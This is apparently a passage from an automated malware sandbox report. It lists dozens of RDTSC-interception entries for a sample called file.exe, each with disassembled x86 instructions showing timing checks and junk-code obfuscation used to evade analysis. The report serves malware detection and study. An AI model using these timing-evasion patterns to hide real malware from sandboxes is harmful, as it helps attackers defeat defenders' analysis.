                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABF26 second address: 10ABFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F08ED2385F2h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F08ED2385E8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 jne 00007F08ED2385ECh 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D3DA1h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F08ED2385E8h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 or ebx, 3E2AAD51h 0x00000056 mov bl, cl 0x00000058 push eax 0x00000059 pushad 0x0000005a jmp 00007F08ED2385F9h 0x0000005f push eax 0x00000060 push edx 0x00000061 ja 00007F08ED2385E6h 0x00000067 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A89BC second address: 10A89C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A89C2 second address: 10A8A4F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ebx, 7F5E5666h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr [ebp+122D2E1Dh], esi 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F08ED2385E8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c mov di, ax 0x0000003f mov dword ptr [ebp+122D2B0Ah], edi 0x00000045 mov eax, dword ptr [ebp+122D08A5h] 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007F08ED2385E8h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 00000015h 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 push FFFFFFFFh 0x00000067 mov di, dx 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F08ED2385F7h 0x00000072 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8A4F second address: 10A8A54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AB0DF second address: 10AB0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F08ED2385F2h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AB0FA second address: 10AB100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFEF4 second address: 10AFF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F08ED2385E6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFF03 second address: 10AFF07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF02B second address: 10AF04F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08ED2385F2h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF04F second address: 10AF0C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, dword ptr [ebp+122D358Dh] 0x00000010 push esi 0x00000011 mov ebx, edi 0x00000013 pop ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b sub dword ptr [ebp+122D1DFFh], edi 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 jc 00007F08ED2F2E86h 0x0000002e mov eax, dword ptr [ebp+122D1249h] 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007F08ED2F2E88h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e adc bh, FFFFFFABh 0x00000051 push FFFFFFFFh 0x00000053 mov dword ptr [ebp+1246C904h], ebx 0x00000059 nop 0x0000005a push eax 0x0000005b push edx 0x0000005c jnc 00007F08ED2F2E88h 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF0C9 second address: 10AF0CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10593E9 second address: 1059407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F08ED2F2E95h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BA874 second address: 10BA87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F08ED2385E6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BA87E second address: 10BA89B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E99h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C18C0 second address: 10C18E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 jmp 00007F08ED2385F5h 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C18E5 second address: 10C18E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C18E9 second address: 10C18EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C19F9 second address: 10C1A1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1A1C second address: 10C1A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1A2C second address: 10C1A69 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F08ED2F2E88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f jnc 00007F08ED2F2E9Fh 0x00000015 pop edx 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jno 00007F08ED2F2E88h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1B37 second address: 10C1B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C57D1 second address: 10C57DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F08ED2F2E86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C57DB second address: 10C57F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F08ED2385F5h 0x0000000c jmp 00007F08ED2385EFh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C57F6 second address: 10C57FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C57FC second address: 10C5800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5800 second address: 10C5806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5806 second address: 10C5812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C631D second address: 10C6321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB0EC second address: 10CB0F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB0F1 second address: 10CB0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB0F9 second address: 10CB102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050DF7 second address: 1050E07 instructions: 0x00000000 rdtsc 0x00000002 je 00007F08ED2F2E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050E07 second address: 1050E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB277 second address: 10CB27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB3D7 second address: 10CB421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007F08ED2385E6h 0x00000010 jg 00007F08ED2385E6h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F08ED2385F1h 0x0000001d popad 0x0000001e pop ebx 0x0000001f jnp 00007F08ED23861Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 jne 00007F08ED2385E6h 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB6ED second address: 10CB701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB701 second address: 10CB725 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F08ED2385F6h 0x00000008 ja 00007F08ED2385E6h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CAE30 second address: 10CAE39 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CC077 second address: 10CC07D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CC07D second address: 10CC081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D83C8 second address: 10D83CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6DAE second address: 10D6DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6DB6 second address: 10D6DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6DBA second address: 10D6DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7229 second address: 10D7236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F08ED2385E8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7236 second address: 10D729A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F08ED2F2E9Ch 0x00000008 je 00007F08ED2F2E86h 0x0000000e jmp 00007F08ED2F2E90h 0x00000013 jnc 00007F08ED2F2E8Ah 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c jmp 00007F08ED2F2E98h 0x00000021 jmp 00007F08ED2F2E97h 0x00000026 jne 00007F08ED2F2E8Eh 0x0000002c push edx 0x0000002d pop edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7435 second address: 10D7439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D756E second address: 10D7572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7572 second address: 10D7578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7A22 second address: 10D7A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7A27 second address: 10D7A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7CB0 second address: 10D7CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F08ED2F2E98h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D81FA second address: 10D821F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007F08ED2385E6h 0x0000000d jmp 00007F08ED2385F7h 0x00000012 pop ecx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D821F second address: 10D8225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6AA2 second address: 10D6AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6AA6 second address: 10D6AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6AAA second address: 10D6ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F08ED2385E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB948 second address: 10DB955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F08ED2F2E86h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB955 second address: 10DB959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB959 second address: 10DB95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A888 second address: 1079EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F08ED2385E8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 call dword ptr [ebp+124596D0h] 0x0000002a pushad 0x0000002b push ebx 0x0000002c push edx 0x0000002d pop edx 0x0000002e pop ebx 0x0000002f jmp 00007F08ED2385EFh 0x00000034 pushad 0x00000035 jns 00007F08ED2385E6h 0x0000003b jne 00007F08ED2385E6h 0x00000041 push edi 0x00000042 pop edi 0x00000043 popad 0x00000044 jne 00007F08ED2385ECh 0x0000004a popad 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e push edx 0x0000004f pop edx 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A998 second address: 109A9A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109AA7A second address: 109AA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08ED2385ECh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109AA8B second address: 109AAAB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F08ED2F2E86h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F08ED2F2E90h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109ADFF second address: 109AE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109AECE second address: 109AF4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jnl 00007F08ED2F2E98h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007F08ED2F2E91h 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F08ED2F2E88h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 jmp 00007F08ED2F2E97h 0x00000037 call 00007F08ED2F2E89h 0x0000003c pushad 0x0000003d push ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109AF4A second address: 109AF81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F08ED2385E8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push esi 0x00000010 jnl 00007F08ED2385ECh 0x00000016 pop esi 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c jmp 00007F08ED2385F2h 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109AF81 second address: 109AF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F08ED2F2E88h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B00D second address: 109B012 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B156 second address: 109B15C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B15C second address: 109B160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B160 second address: 109B184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B184 second address: 109B197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B197 second address: 109B19D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B19D second address: 109B1B4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B1B4 second address: 109B1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B1B9 second address: 109B1BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B2C0 second address: 109B2C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B2C5 second address: 109B2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B86D second address: 109B8E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F08ED2F2E88h 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F08ED2F2E96h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F08ED2F2E88h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 0000001Eh 0x00000030 movzx edi, si 0x00000033 nop 0x00000034 jo 00007F08ED2F2E9Bh 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d jmp 00007F08ED2F2E91h 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F08ED2F2E90h 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B8E6 second address: 109B8EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109BB10 second address: 109BB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F08ED2F2E86h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109BB1B second address: 109BB21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DC719 second address: 10DC71E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
